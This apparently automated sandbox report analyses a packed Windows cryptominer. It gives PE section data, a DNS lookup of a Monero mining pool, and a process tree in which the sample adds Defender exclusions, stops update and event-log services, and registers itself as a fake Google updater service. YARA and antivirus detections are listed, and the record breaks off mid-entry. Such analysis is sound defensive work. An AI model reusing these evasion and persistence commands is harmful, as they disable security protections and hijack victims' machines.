                                        add dl, dl
                                        jne 00007F9DE50BA6A9h
                                        mov dl, byte ptr [esi]
                                        dec eax
                                        inc esi
                                        adc dl, dl
                                        jc 00007F9DE50BA688h
                                        sub eax, ebx
                                        mov ebx, 00000001h
                                        jne 00007F9DE50BA6D0h
                                        mov ecx, 00000001h
Name                                 | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT         | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IMPORT         | 0x6e3042        | 0x64         | .imports
IMAGE_DIRECTORY_ENTRY_RESOURCE       | 0x6e5000        | 0x348        | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION      | 0xc033fc        | 0x1a4        | .themida
IMAGE_DIRECTORY_ENTRY_SECURITY       | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BASERELOC      | 0xf28000        | 0x10         | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG          | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR      | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_TLS            | 0x6e4028        | 0x28         | .tls
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG    | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_IAT            | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT   | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0             | 0x0          |
IMAGE_DIRECTORY_ENTRY_RESERVED       | 0x0             | 0x0          |
Name     | Virtual Address | Virtual Size | Raw Size | MD5                              | Xored PE | ZLIB Complexity    | File Type            | Entropy            | Characteristics
         | 0x1000          | 0x10e26      | 0x6f06   | 193682cf8d1f654e26b4e7026b469de4 | False    | 0.9915558370276546 | data                 | 7.964649025796498  | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
         | 0x12000         | 0x2a8c       | 0x1343   | b0ca2516155ce5df53c8905204f930f6 | False    | 1.002230784830663  | data                 | 7.933205349560523  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
         | 0x15000         | 0x6c8320     | 0x51a52e | 55c2a574d6ffe337513b87003d3237e9 | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
         | 0x6de000        | 0x198        | 0x10a    | b2f1c06c53a30dfd848ee5d9d8eb80ba | False    | 1.0413533834586466 | data                 | 6.8916988852955265 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
         | 0x6df000        | 0x10         | 0x10     | 1edd6d692b86dc07ee12c671511bb427 | False    | 1.5625             | data                 | 3.875              | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
         | 0x6e0000        | 0x10         | 0x6      | 6ae543a2e002aa7d52a01df5103e1a79 | False    | 2.3333333333333335 | data                 | 2.584962500721156  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
         | 0x6e1000        | 0x350        | 0x16e    | 72af9ed5ebb806bedf8a93610402cff0 | False    | 1.030054644808743  | data                 | 7.375743137600779  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
         | 0x6e2000        | 0x78         | 0x69     | 6f69df47a858ad1dd662ba719ee1981c | False    | 1.1047619047619048 | data                 | 6.080632898494871  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
.imports | 0x6e3000        | 0x1000       | 0x200    | 46be7d863a64363f8b65a25ee833d78f | False    | 0.1796875          | data                 | 1.2657209021050075 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls     | 0x6e4000        | 0x1000       | 0x200    | ec0ffde6834be88667d15ede52ae8b07 | False    | 0.060546875        | data                 | 0.31592487960959603 | IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.rsrc    | 0x6e5000        | 0x1000       | 0x400    | 2468ef38b7adebb983068c293c71e313 | False    | 0.369140625        | data                 | 2.858717175514925  | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.themida | 0x6e6000        | 0x546000     | 0x0      | d41d8cd98f00b204e9800998ecf8427e | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.boot    | 0xc2c000        | 0x2fbe00     | 0x2fbe00 | 90b0753e2205263e70ed1e64b99cc640 | unknown  | unknown            | unknown              | unknown            | IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc   | 0xf28000        | 0x1000       | 0x10     | a2277de4b751aa34049f7464db99f5a7 | False    | 1.5                | GLS_BINARY_LSB_FIRST | 2.6493974703476995 | IMAGE_SCN_MEM_READ
                                        Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                        RT_VERSION | 0x6e5058 | 0x2f0 | SysEx File - ID | English | United States | 0.45611702127659576
                                        DLL | Import
                                        kernel32.dll | GetModuleHandleA
                                        msvcrt.dll | __C_specific_handler
                                        Language of compilation system | Country where language is spoken | Map
                                        English | United States |
                                        Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                        Oct 7, 2024 03:03:15.933079004 CEST | 54275 | 53 | 192.168.2.5 | 1.1.1.1
                                        Oct 7, 2024 03:03:15.941333055 CEST | 53 | 54275 | 1.1.1.1 | 192.168.2.5
                                        Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                        Oct 7, 2024 03:03:15.933079004 CEST | 192.168.2.5 | 1.1.1.1 | 0xf442 | Standard query (0) | xmr-eu1.nanopool.org | A (IP address) | IN (0x0001) | false
                                        Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 54.37.137.114 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 212.47.253.124 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 162.19.224.121 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 146.59.154.106 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 51.15.58.224 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 163.172.154.142 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 51.15.65.182 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 54.37.232.103 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 51.89.23.91 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 141.94.23.83 | A (IP address) | IN (0x0001) | false
                                        Oct 7, 2024 03:03:15.941333055 CEST | 1.1.1.1 | 192.168.2.5 | 0xf442 | No error (0) | xmr-eu1.nanopool.org |  | 51.15.193.130 | A (IP address) | IN (0x0001) | false


                                        Target ID:0
                                        Start time:21:03:01
                                        Start date:06/10/2024
                                        Path:C:\Users\user\Desktop\TwrhjEKqxk.exe
                                        Wow64 process (32bit):false
                                        Commandline:"C:\Users\user\Desktop\TwrhjEKqxk.exe"
                                        Imagebase:0x7ff79f760000
                                        File size:8'538'008 bytes
                                        MD5 hash:DBF8D8EF015846D4078466A7C1D3F41C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:low
                                        Has exited:true

                                        Target ID:2
                                        Start time:21:03:02
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:3
                                        Start time:21:03:02
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:5
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff6982b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:6
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:7
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:8
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:9
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7d0790000
                                        File size:345'088 bytes
                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:10
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:11
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:12
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop wuauserv
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:13
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:high
                                        Has exited:true

                                        Target ID:14
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop bits
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Reputation:moderate
                                        Has exited:true

                                        Target ID:15
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:16
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop dosvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:17
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:18
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:19
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:20
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:21
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:22
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:23
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\powercfg.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        Imagebase:0x7ff63f640000
                                        File size:96'256 bytes
                                        MD5 hash:9CA38BE255FFF57A92BD6FBF8052B705
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:24
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:25
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:26
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe delete "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:27
                                        Start time:21:03:07
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:28
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe create "GoogleUpdateTaskMachineQC" binpath= "C:\ProgramData\Google\Chrome\updater.exe" start= "auto"
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:29
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:30
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop eventlog
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:31
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe start "GoogleUpdateTaskMachineQC"
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:32
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:33
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:34
                                        Start time:21:03:08
                                        Start date:06/10/2024
                                        Path:C:\ProgramData\Google\Chrome\updater.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\ProgramData\Google\Chrome\updater.exe
                                        Imagebase:0x7ff7d9930000
                                        File size:8'538'008 bytes
                                        MD5 hash:DBF8D8EF015846D4078466A7C1D3F41C
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Yara matches:
                                        • Rule: JoeSecurity_Xmrig, Description: Yara detected Xmrig cryptocurrency miner, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: Joe Security
                                        • Rule: MacOS_Cryptominer_Xmrig_241780a1, Description: unknown, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: unknown
                                        • Rule: MAL_XMR_Miner_May19_1, Description: Detects Monero Crypto Coin Miner, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: Florian Roth
                                        • Rule: MALWARE_Win_CoinMiner02, Description: Detects coinmining malware, Source: 00000022.00000003.2189149563.000002166EE40000.00000004.00000001.00020000.00000000.sdmp, Author: ditekSHen
                                        Antivirus matches:
                                        • Detection: 100%, Avira
                                        • Detection: 55%, ReversingLabs
                                        • Detection: 46%, Virustotal
                                        Has exited:true

                                        Target ID:35
                                        Start time:21:03:11
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                        Imagebase:0x7ff7be880000
                                        File size:452'608 bytes
                                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:36
                                        Start time:21:03:11
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:37
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\cmd.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff6982b0000
                                        File size:289'792 bytes
                                        MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:38
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop UsoSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:39
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:40
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                        Imagebase:0x7ff6d64d0000
                                        File size:862'208 bytes
                                        MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:41
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\wusa.exe
                                        Wow64 process (32bit):false
                                        Commandline:wusa /uninstall /kb:890830 /quiet /norestart
                                        Imagebase:0x7ff7d0790000
                                        File size:345'088 bytes
                                        MD5 hash:FBDA2B8987895780375FE0E6254F6198
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:42
                                        Start time:21:03:13
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\sc.exe
                                        Wow64 process (32bit):false
                                        Commandline:C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        Imagebase:0x7ff7fb820000
                                        File size:72'192 bytes
                                        MD5 hash:3FB5CF71F7E7EB49790CB0E663434D80
                                        Has elevated privileges:true
                                        Has administrator privileges:true
                                        Programmed in:C, C++ or other language
                                        Has exited:true

                                        Target ID:43
                                        Start time:21:03:14
                                        Start date:06/10/2024
                                        Path:C:\Windows\System32\conhost.exe
                                        Wow64 process (32bit):false
